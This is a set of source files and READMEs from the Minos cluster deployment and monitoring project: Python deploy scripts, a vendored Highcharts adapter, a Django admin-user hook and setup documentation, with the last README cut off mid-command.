"text": "import deploy_utils\n\nfrom log import Log\n\nALL_JOBS = [\"restserver\", \"proxy\", \"cleaner\"]\n\ndef _get_fds_service_config(args):\n args.fds_config = deploy_utils.get_service_config(args)\n\ndef install(args):\n _get_fds_service_config(args)\n deploy_utils.install_service(args, \"fds\", args.fds_config, \"galaxy\")\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token):\n # parse the service_config according to the instance_id\n args.fds_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n deploy_utils.bootstrap_job(args, \"galaxy\", \"fds\",\n args.fds_config, host, job_name, instance_id, cleanup_token, '0')\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n _get_fds_service_config(args)\n cleanup_token = deploy_utils.confirm_bootstrap(\"fds\", args.fds_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.fds_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n bootstrap_job(args, hosts[host_id].ip, job_name, host_id, instance_id, cleanup_token)\n\ndef generate_run_scripts_params(args, host, job_name, host_id, instance_id):\n job = args.fds_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"fds\", args.fds_config.cluster.name, job_name, instance_id=instance_id)\n\n artifact_and_version = \"galaxy-fds-\" + args.fds_config.cluster.version\n\n component_dir = \"$package_dir\"\n jar_dirs = \"%s/lib/guava-11.0.2.jar:%s/:%s/lib/*\" % (\n component_dir, component_dir, component_dir)\n log_level = deploy_utils.get_service_log_level(args, args.fds_config)\n\n params = job.get_arguments(args, args.fds_config.cluster, args.fds_config.jobs,\n args.fds_config.arguments_dict, job_name, host_id, instance_id)\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"jar_dirs\": jar_dirs,\n \"run_dir\": supervisor_client.get_run_dir(),\n \"params\": params,\n }\n\n return script_dict\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n return deploy_utils.create_run_script(\n \"%s/start.sh.tmpl\" % deploy_utils.get_template_dir(), script_params)\n\ndef generate_configs(args, host, job_name, instance_id):\n core_site_xml = deploy_utils.generate_site_xml(args,\n args.fds_config.configuration.generated_files[\"core-site.xml\"])\n hdfs_site_xml = deploy_utils.generate_site_xml(args,\n args.fds_config.configuration.generated_files[\"hdfs-site.xml\"])\n hbase_site_xml = deploy_utils.generate_site_xml(args,\n args.fds_config.configuration.generated_files[\"hbase-site.xml\"])\n galaxy_site_xml = deploy_utils.generate_site_xml(args,\n args.fds_config.configuration.generated_files[\"galaxy-site.xml\"])\n zookeeper_properties = deploy_utils.generate_properties_file(args,\n args.fds_config.configuration.generated_files[\"zookeeper.properties\"])\n mapred_site_xml = deploy_utils.generate_site_xml(args,\n args.fds_config.configuration.generated_files[\"mapred-site.xml\"])\n yarn_site_xml = deploy_utils.generate_site_xml(args,\n args.fds_config.configuration.generated_files[\"yarn-site.xml\"])\n passport_properties = deploy_utils.generate_properties_file(args,\n args.fds_config.configuration.generated_files[\"passport.properties\"])\n\n config_files = {\n \"core-site.xml\": core_site_xml,\n \"hdfs-site.xml\": hdfs_site_xml,\n \"hbase-site.xml\": hbase_site_xml,\n \"galaxy-site.xml\": galaxy_site_xml,\n \"zookeeper.properties\": zookeeper_properties,\n \"mapred-site.xml\": mapred_site_xml,\n \"yarn-site.xml\": yarn_site_xml,\n \"passport.properties\": passport_properties,\n }\n config_files.update(args.fds_config.configuration.raw_files)\n\n return config_files\n\ndef start_job(args, host, job_name, host_id, instance_id):\n # parse the service_config according to the instance_id\n args.fds_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n config_files = generate_configs(args, host, job_name, instance_id)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = deploy_utils.get_http_service_uri(host,\n args.fds_config.jobs[job_name].base_port, instance_id)\n deploy_utils.start_job(args, \"galaxy\", \"fds\", args.fds_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n _get_fds_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.fds_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"fds\", args.fds_config,\n host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n _get_fds_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.fds_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n _get_fds_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.fds_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.fds_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.wait_for_job_stopping(\"fds\",\n args.fds_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n\ndef cleanup(args):\n _get_fds_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"fds\", args.fds_config)\n for job_name in args.job or ALL_JOBS:\n hosts = args.fds_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.cleanup_job(\"fds\", args.fds_config,\n hosts[host_id].ip, job_name, instance_id, cleanup_token)\n\ndef show(args):\n _get_fds_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.fds_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.show_job(\"fds\", args.fds_config,\n hosts[host_id].ip, job_name, instance_id)\n\ndef rolling_update(args):\n if not args.job:\n Log.print_critical(\"You must specify the job name to do rolling update\")\n\n _get_fds_service_config(args)\n job_name = args.job[0]\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.fds_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"fds\",\n args.fds_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"fds\",\n args.fds_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n wait_time = args.time_interval\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\ndef run_shell(args):\n Log.print_critical(\"'shell' command is not supported!\")\n\ndef pack(args):\n Log.print_critical(\"'pack' command is not supported!\")\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.5242347121238708,
"alphanum_fraction": 0.5301870703697205,
"avg_line_length": 45.117645263671875,
"blob_id": "0c4babb47cc2089613ce4ae663784a3931bf5679",
"content_id": "8e53af5332eb34dec39605d70823b15c77686ee0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": true,
"language": "JavaScript",
"length_bytes": 4704,
"license_type": "permissive",
"max_line_length": 168,
"num_lines": 102,
"path": "/owl/static/highcharts/adapters/prototype-adapter.js",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "/*\n Highcharts JS v2.3.3 (2012-10-04)\n Prototype adapter\n\n @author Michael Nelson, Torstein Hønsi.\n\n Feel free to use and modify this script.\n Highcharts license: www.highcharts.com/license.\n */\nvar HighchartsAdapter = function () {\n var g = typeof Effect !== \"undefined\";\n return{init:function (c) {\n if (g)Effect.HighchartsTransition = Class.create(Effect.Base, {initialize:function (a, b, d, e) {\n var f;\n this.element = a;\n this.key = b;\n f = a.attr ? a.attr(b) : $(a).getStyle(b);\n if (b === \"d\")this.paths = c.init(a, a.d, d), this.toD = d, f = 0, d = 1;\n this.start(Object.extend(e || {}, {from:f, to:d, attribute:b}))\n }, setup:function () {\n HighchartsAdapter._extend(this.element);\n if (!this.element._highchart_animation)this.element._highchart_animation = {};\n this.element._highchart_animation[this.key] =\n this\n }, update:function (a) {\n var b = this.paths, d = this.element;\n b && (a = c.step(b[0], b[1], a, this.toD));\n d.attr ? d.attr(this.options.attribute, a) : (b = {}, b[this.options.attribute] = a, $(d).setStyle(b))\n }, finish:function () {\n delete this.element._highchart_animation[this.key]\n }})\n }, adapterRun:function (c, a) {\n return parseInt($(c).getStyle(a), 10)\n }, getScript:function (c, a) {\n var b = $$(\"head\")[0];\n b && b.appendChild((new Element(\"script\", {type:\"text/javascript\", src:c})).observe(\"load\", a))\n }, addNS:function (c) {\n var a = /^(?:click|mouse(?:down|up|over|move|out))$/;\n return/^(?:load|unload|abort|error|select|change|submit|reset|focus|blur|resize|scroll)$/.test(c) || a.test(c) ? c : \"h:\" + c\n }, addEvent:function (c, a, b) {\n c.addEventListener || c.attachEvent ? Event.observe($(c), HighchartsAdapter.addNS(a), b) : (HighchartsAdapter._extend(c), c._highcharts_observe(a, b))\n }, animate:function (c, a, b) {\n var d, b = b || {};\n b.delay = 0;\n b.duration = (b.duration || 500) / 1E3;\n b.afterFinish = b.complete;\n if (g)for (d in a)new Effect.HighchartsTransition($(c), d, a[d], b); else {\n if (c.attr)for (d in a)c.attr(d, a[d]);\n b.complete &&\n b.complete()\n }\n c.attr || $(c).setStyle(a)\n }, stop:function (c) {\n var a;\n if (c._highcharts_extended && c._highchart_animation)for (a in c._highchart_animation)c._highchart_animation[a].cancel()\n }, each:function (c, a) {\n $A(c).each(a)\n }, inArray:function (c, a) {\n return a.indexOf(c)\n }, offset:function (c) {\n return $(c).cumulativeOffset()\n }, fireEvent:function (c, a, b, d) {\n c.fire ? c.fire(HighchartsAdapter.addNS(a), b) : c._highcharts_extended && (b = b || {}, c._highcharts_fire(a, b));\n b && b.defaultPrevented && (d = null);\n d && d(b)\n }, removeEvent:function (c, a, b) {\n $(c).stopObserving && (a && (a = HighchartsAdapter.addNS(a)), $(c).stopObserving(a, b));\n window === c ? Event.stopObserving(c, a, b) : (HighchartsAdapter._extend(c), c._highcharts_stop_observing(a, b))\n }, washMouseEvent:function (c) {\n return c\n }, grep:function (c, a) {\n return c.findAll(a)\n }, map:function (c, a) {\n return c.map(a)\n }, merge:function () {\n function c(a, b) {\n var d, e;\n for (e in b)d = b[e], a[e] = d && typeof d === \"object\" && d.constructor !== Array && typeof d.nodeType !== \"number\" ? c(a[e] || {}, d) : b[e];\n return a\n }\n\n return function () {\n var a = arguments,\n b, d = {};\n for (b = 0; b < a.length; b++)d = c(d, a[b]);\n return d\n }.apply(this, arguments)\n }, _extend:function (c) {\n c._highcharts_extended || Object.extend(c, {_highchart_events:{}, _highchart_animation:null, _highcharts_extended:!0, _highcharts_observe:function (a, b) {\n this._highchart_events[a] = [this._highchart_events[a], b].compact().flatten()\n }, _highcharts_stop_observing:function (a, b) {\n a ? b ? this._highchart_events[a] = [this._highchart_events[a]].compact().flatten().without(b) : delete this._highchart_events[a] : this._highchart_events =\n {}\n }, _highcharts_fire:function (a, b) {\n (this._highchart_events[a] || []).each(function (a) {\n if (!b.stopped)b.preventDefault = function () {\n b.defaultPrevented = !0\n }, a.bind(this)(b) === !1 && b.preventDefault()\n }.bind(this))\n }})\n }}\n}();\n"
},
{
"alpha_fraction": 0.6480374336242676,
"alphanum_fraction": 0.6516766548156738,
"avg_line_length": 34.62036895751953,
"blob_id": "1c4a2f16c818f681ab40b06d4a8ac7b2b973c9eb",
"content_id": "1d14caa8c933b154f22dfcb486ea429128a64e88",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3847,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 108,
"path": "/supervisor/deploy_supervisor.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n\nimport ConfigParser\nimport os\nimport pexpect\nimport sys\n\ndef scp(host, user, passwd, local_file, remote_file):\n child = pexpect.spawn('scp -r %s %s@%s:%s' % (local_file,\n user, host, remote_file))\n print child.args\n\n ret = child.expect(['yes/no.*', 'password.*', pexpect.EOF,\n pexpect.TIMEOUT], timeout=30)\n if ret == 0:\n child.sendline('yes')\n child.expect('password.*', timeout=30)\n child.sendline(passwd)\n child.expect(pexpect.EOF)\n elif ret == 1:\n child.sendline(passwd)\n child.expect(pexpect.EOF)\n\ndef remote_exec(host, user, passwd, cmd):\n child = pexpect.spawn('ssh %s@%s \"%s\"' % (user, host, cmd))\n print child.args\n\n ret = child.expect(['yes/no.*', 'password.*', pexpect.EOF,\n pexpect.TIMEOUT], timeout=30)\n if ret == 0:\n child.sendline('yes')\n child.expect('password.*', timeout=30)\n child.sendline(passwd)\n child.expect(pexpect.EOF)\n elif ret == 1:\n child.sendline(passwd)\n child.expect(pexpect.EOF)\n\nclass Config:\n class NodeConfig:\n def __init__(self, config_dict):\n self.password = str()\n self.hosts = dict()\n for key, value in config_dict.iteritems():\n if key.startswith('host.'):\n self.hosts.update({key.split('.')[1]: value})\n else:\n setattr(self, key, value)\n\n def __init__(self, config_file):\n self.config = ConfigParser.SafeConfigParser()\n self.config.read([config_file])\n self.groups = set()\n\n def parse(self):\n for section in self.config.sections():\n config_dict = dict()\n for option in self.config.options(section):\n value = self.config.get(section, option)\n config_dict.update({option: value})\n node_config = Config.NodeConfig(config_dict)\n self.groups.add(section)\n setattr(self, section, node_config)\n\ndef generate_supervisor_config(run_dir, config, file):\n parser = ConfigParser.SafeConfigParser()\n parser.read([file])\n parser.set('rpcinterface:deployment', 'data_dirs', config.data_dirs)\n parser.write(open('%s/%s.tmp' % (run_dir, os.path.basename(file)), 'w'))\n\ndef deploy(supervisor_config, config):\n run_dir = os.path.dirname(sys.argv[0])\n generate_supervisor_config(run_dir, config, supervisor_config)\n\n for host in config.hosts.itervalues():\n user = config.user\n password = config.password\n dest_path = '%s/supervisor/' % config.root_dir\n remote_exec(host, user, password,\n 'cd %s; mkdir -p supervisor' % config.root_dir)\n scp(host, user, password, '%s/conf' % run_dir, dest_path)\n scp(host, user, password, '%s/deployment' % run_dir, dest_path)\n scp(host, user, password, '%s/metrics' % run_dir, dest_path)\n scp(host, user, password, '%s/superlance' % run_dir, dest_path)\n scp(host, user, password, '%s/supervisor' % run_dir, dest_path)\n scp(host, user, password, '%s/start_supervisor.sh' % run_dir, dest_path)\n scp(host, user, password, '%s/stop_supervisor.sh' % run_dir, dest_path)\n scp(host, user, password, '%s/supervisorctl.py' % run_dir, dest_path)\n scp(host, user, password, '%s/supervisord.py' % run_dir, dest_path)\n scp(host, user, password, '%s/%s.tmp' % (run_dir,\n os.path.basename(supervisor_config)),\n '%s/supervisord.conf' % dest_path)\n remote_exec(host, user, password,\n 'cd %s/supervisor; ./start_supervisor.sh' % config.root_dir)\n\ndef main(supervisor_config, deploy_config):\n config = Config(deploy_config)\n config.parse()\n for group in config.groups:\n deploy(supervisor_config, getattr(config, group))\n\nif __name__ == '__main__':\n sys.path.append('%s/../client' % os.path.dirname(__file__))\n from deploy import deploy_utils\n supervisor_config = '%s/supervisord.conf' % deploy_utils.get_config_dir()\n deploy_config = '%s/deploy_supervisor.cfg' % deploy_utils.get_config_dir()\n main(supervisor_config, deploy_config)\n"
},
{
"alpha_fraction": 0.5078212022781372,
"alphanum_fraction": 0.5430167317390442,
"avg_line_length": 27.870967864990234,
"blob_id": "43c15748e9f9c0ddd836ad8b48919490da4cf9c8",
"content_id": "97769681a89ecac29c5b4a81f332bb0bd344cfa3",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1790,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 62,
"path": "/supervisor/supervisor/medusa/thread/pi_module.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# [reworking of the version in Python-1.5.1/Demo/scripts/pi.py]\n\n# Print digits of pi forever.\n#\n# The algorithm, using Python's 'long' integers (\"bignums\"), works\n# with continued fractions, and was conceived by Lambert Meertens.\n#\n# See also the ABC Programmer's Handbook, by Geurts, Meertens & Pemberton,\n# published by Prentice-Hall (UK) Ltd., 1990.\n\nimport string\n\nStopException = \"Stop!\"\n\ndef go (file):\n try:\n k, a, b, a1, b1 = 2L, 4L, 1L, 12L, 4L\n while 1:\n # Next approximation\n p, q, k = k*k, 2L*k+1L, k+1L\n a, b, a1, b1 = a1, b1, p*a+q*a1, p*b+q*b1\n # Print common digits\n d, d1 = a/b, a1/b1\n while d == d1:\n if file.write (str(int(d))):\n raise StopException\n a, a1 = 10L*(a%b), 10L*(a1%b1)\n d, d1 = a/b, a1/b1\n except StopException:\n return\n\nclass line_writer:\n\n \"partition the endless line into 80-character ones\"\n\n def __init__ (self, file, digit_limit=10000):\n self.file = file\n self.buffer = ''\n self.count = 0\n self.digit_limit = digit_limit\n\n def write (self, data):\n self.buffer = self.buffer + data\n if len(self.buffer) > 80:\n line, self.buffer = self.buffer[:80], self.buffer[80:]\n self.file.write (line+'\\r\\n')\n self.count = self.count + 80\n if self.count > self.digit_limit:\n return 1\n else:\n return 0\n\ndef main (env, stdin, stdout):\n parts = string.split (env['REQUEST_URI'], '/')\n if len(parts) >= 3:\n ndigits = string.atoi (parts[2])\n else:\n ndigits = 5000\n stdout.write ('Content-Type: text/plain\\r\\n\\r\\n')\n go (line_writer (stdout, ndigits))\n"
},
{
"alpha_fraction": 0.7317396998405457,
"alphanum_fraction": 0.7317396998405457,
"avg_line_length": 33.227272033691406,
"blob_id": "c8822a9bab8ac67d194ba2b61a94eeca3e2c56b3",
"content_id": "0b2a1b31eae4f73d18bcb0cd0807a7254c268199",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 753,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 22,
"path": "/owl/machine/management/__init__.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_syncdb\nfrom django.dispatch import receiver\n\n\n@receiver(post_syncdb, dispatch_uid='machine.load_builtin_data')\ndef load_builtin_data(sender, **kwargs):\n # add several pre-defined admin users or change them as superusers.\n for name, email in settings.ADMINS:\n try:\n user = User.objects.get(username=name)\n user.is_superuser = True\n user.email = email\n except User.DoesNotExist:\n user = User(username=name, is_superuser=True, email=email)\n\n user.save()\n\n # set all others as non-superusers.\n User.objects.exclude(username__in=[name for name, email in settings.ADMINS]\n ).update(is_superuser=False)\n"
},
{
"alpha_fraction": 0.7020648717880249,
"alphanum_fraction": 0.7404129505157471,
"avg_line_length": 17.83333396911621,
"blob_id": "cd544f6cca4bf6ccf5c6842a5f723d902d508133",
"content_id": "0ffd019b991b134a038fbc40c7ae0ddf0e572eae",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 339,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 18,
"path": "/owl/libs/README.md",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "## File\nLibrary for zookeeper c client\n libzookeeper_mt.so.2 \nLibrary for zkpython\n zookeeper.so\n\n##Build method(on CentOS 6)\n\n1. sudo yum install cppunit-devel\n2. cd zookeeper\n3. mvn clean package\n4. cd zookeeper/src/c\n5. autoreconf -if\n6. ./configure\n7. make\n8. sudo make install\n9. cd zookeeper/src/contrib/zkpython\n10. ant build\n"
},
{
"alpha_fraction": 0.773809552192688,
"alphanum_fraction": 0.773809552192688,
"avg_line_length": 13,
"blob_id": "b1c8e44f5a6d31054c5ce14bfe6fa837265eb779",
"content_id": "2489d24fe91eaf3cddaebcccc8e6f9e8e2b722d9",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 84,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 6,
"path": "/supervisor/supervisorctl.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n\nfrom supervisor import supervisorctl\n\nsupervisorctl.main()\n"
},
{
"alpha_fraction": 0.7354230880737305,
"alphanum_fraction": 0.7437527179718018,
"avg_line_length": 46.1931037902832,
"blob_id": "28d2c2b2c3f50885cc3783bfb06c17e1ef4a99a4",
"content_id": "676d65019239815e11487d1fb4861a085c9fe251",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13686,
"license_type": "permissive",
"max_line_length": 538,
"num_lines": 290,
"path": "/README.md",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "<img src=\"minos.png\" width=\"200\" height=\"80\"></img>\n\n# What is Minos\n\nMinos is a distributed deployment and monitoring system. It was initially developed and used at [Xiaomi](http://www.xiaomi.com) to deploy and manage the Hadoop, HBase and ZooKeeper clusters used in the company. Minos can be easily extended to support other systems, among which HDFS, YARN and Impala have been supported in the current release.\n\n# Components\n\nThe Minos system contains the following four components:\n\n* [Client](#client)\n* [Owl](#owl)\n* [Supervisor](#supervisor)\n* [Tank](#tank)\n\n<img src=\"minos_structure.png\" width=\"800\" height=\"490\"></img>\n\n## Client\n\nThis is the command line client tool used to deploy and manage processes of various systems. You can use this client to perform various deployment tasks, e.g. installing, (re)starting, stopping a service. Currently, this client supports ZooKeeper, HDFS, HBase, YARN and Impala. It can be extended to support other systems. You can refer to the following [Using Client](#using-client) to learn how to use it.\n\n## Owl\n\nThis is the dashboard system to display the status of all processes, where users can take a overview of the whole clusters managed by Minos. It collects data from servers through JMX interface. And it organizes pages in cluster, job and task corresponding to the definition in cluster configuration. It also provides some utils like health alerter, HDFS quota updater and quota reportor. You can refer to [Installing Owl](#installing-owl) to learn how to install and use it.\n\n## Supervisor\n\nThis is the process management and monitoring system. [Supervisor](http://supervisord.org/) is an open source project, a client/server system that allows its users to monitor and control a number of processes on a UNIX-like operating system.\n\nBased on the version of supervisor-3.0b1, we extended Supervisor to support Minos. We implemented an RPC interface under the `deployment` directory, so that our deploy client can invoke the services supplied by supervisord.\n\nWhen deploying a Hadoop cluster for the first time, you need to set up `supervisord` on every production machine. This only needs to be done once. You can refer to [Installing Supervisor](#installing-supervisor) to learn how to install and use it.\n\n## Tank\n\nThis is a simple package management Django app server for our deployment tool. When setting up a cluster for the first time, you should set up a tank server first. This also needs to be done only once. You can refer to [Installing Tank](#installing-tank) to learn how to install and use it.\n\n# Setting Up Minos on Centos/Ubuntu\n\n## Prerequisites\n\n### Install Python\n\nMake sure install Python 2.7 or later from <http://www.python.org>.\n\n### Install JDK\n\nMake sure that the Oracle Java Development Kit 6 is installed (not OpenJDK) from <http://www.oracle.com/technetwork/java/javase/downloads/index.html>, and that `JAVA_HOME` is set in your environment.\n\n## Building Minos\n\n### Clone the Minos repository\n\nTo Using Minos, just check out the code on your production machine:\n\n git clone https://github.com/XiaoMi/minos.git\n\n### Build the virtual environment\n\nAll the Components of Minos run with its own virtual environment. So, before using Minos, building the virtual environment firstly.\n\n cd minos\n ./build.sh build\n\n> **Note:** If you only use the Client component on your current machine, this operation is enough, then you can refer to [Using Client](#using-client) to learn how to deploy and manage a cluster. If you want to use the current machine as a Tank server, you can refer to [Installing Tank](#installing-tank) to learn how to do that. Similarly, if you want to use the current machine as a Owl server or a Supervisor server, you can refer to [Installing Owl](#installing-owl) and [Installing Supervisor](#installing-supervisor) respectively.\n\n## Installing Tank\n\n### Start Tank\n\n cd minos\n ./build.sh start tank --tank_ip ${your_local_ip} --tank_port ${port_tank_will_listen}\n\n> **Note:** If you do not specify the `tank_ip` and `tank_port`, it will start tank server using `0.0.0.0` on `8000` port.\n\n### Stop Tank\n\n ./build.sh stop tank\n\n## Installing Supervisor\n\n### Prerequisites\n\nMake sure you have intstalled [Tank](#tank) on one of the production machines.\n\n### Start Supervisor\n\n cd minos\n ./build.sh start supervisor --tank_ip ${tank_server_ip} --tank_port ${tank_server_port}\n\nWhen starting supervisor for the first time, the `tank_ip` and `tank_port` must be specified.\n\nAfter starting supervisor on the destination machine, you can access the web interface of the supervisord. For example, if supervisord listens on port 9001, and the serving machine's IP address is 192.168.1.11, you can access the following URL to view the processes managed by supervisord:\n\n http://192.168.1.11:9001/\n\n### Stop Supervisor\n\n ./build.sh stop supervisor\n\n### Monitor Processes\n\nWe use Superlance to monitor processes. [Superlance](https://pypi.python.org/pypi/superlance) is a package of plug-in utilities for monitoring and controlling processes that run under supervisor.\n\nWe integrate `superlance-0.7` to our supervisor system, and use the crashmail tool to monitor all processes. When a process exits unexpectedly, crashmail will send an alert email to a mailing list that is configurable.\n\nWe configure crashmail as an auto-started process. It will start working automatically when the supervisor is started. Following is a config example, taken from `minos/build/template/supervisord.conf.tmpl`, that shows how to configure crashmail:\n\n [eventlistener:crashmailbatch-monitor]\n command=python superlance/crashmailbatch.py \\\n --toEmail=\"[email protected]\" \\\n --fromEmail=\"[email protected]\" \\\n --password=\"123456\" \\\n --smtpHost=\"mail.example.com\" \\\n --tickEvent=TICK_5 \\\n --interval=0.5\n events=PROCESS_STATE,TICK_5\n buffer_size=100\n stdout_logfile=crashmailbatch.stdout\n stderr_logfile=crashmailbatch.stderr\n autostart=true\n\n> **Note:** The related configuration information such as the server `port` or `username` is set in `minos/build/template/supervisord.conf.tmpl`, if you don't want to use the default value, change it.\n\n\n## Using Client\n\n### Prerequisites\n\nMake sure you have intstalled [Tank](#tank) and [Supervisor](#supervisor) on your production machines.\n\n### A Simple Tutorial\n\nHere we would like to show you how to use the client in a simple tutorial. In this tutorial we will use Minos to deploy an HDFS service, which itself requires the deployment of a ZooKeeper service.\n\nThe following are some conventions we will use in this tutorial:\n\n* **Cluster type**: we define three types of clusters: `tst` for testing, `prc` for offline processing, and `srv` for online serving.\n* **ZooKeeper cluster name**: we define the ZooKeeper cluster name using the IDC short name and the cluster type. For example, `dptst` is used to name a testing cluster at IDC `dp`.\n* **Other service cluster names**: we define other service cluster names using the corresponding ZooKeeper cluster name and the name of the business for which the service is intended to serve. For example, the `dptst-example` is the name of a testing cluster used to do example tests.\n* **Configuration file names**: all the services will have a corresponding configuration file, which will be named as `${service}-${cluster}.cfg`. For example, the `dptst` ZooKeeper service's configuration file is named as `zookeeper-dptst.cfg`, and the `dptst` example HDFS service's configuration file is named as `hdfs-dptst-example.cfg`.\n\n#### Configuring `deploy.cfg`\n\nThere is a configuration file named `deploy.cfg` under the root directory of minos. You should first edit this file to set up the deployment environment. Make sure that all service packages are prepared and configured in `deploy.cfg`.\n\n#### Configuring ZooKeeper\n\nAs mentioned in the cluster naming conventions, we will set up a testing ZooKeeper cluster at the `dp` IDC, and the corresponding configuration file for the cluster will be named as `zookeeper-dptst.cfg`.\n\nYou can edit `zookeeper-dptst.cfg` under the `config/conf/zookeeper` directory to configure the cluster. The `zookeeper-dptst.cfg` is well commented and self explained, so we will not explain more here.\n\n#### Setting up a ZooKeeper Cluster\nTo set up a ZooKeeper cluster, just do the following two steps:\n\n* Install a ZooKeeper package to the tank server:\n\n cd minos/client\n ./deploy install zookeeper dptst\n\n* Bootstrap the cluster, this is only needed once when the cluster is setup for the first time:\n\n ./deploy bootstrap zookeeper 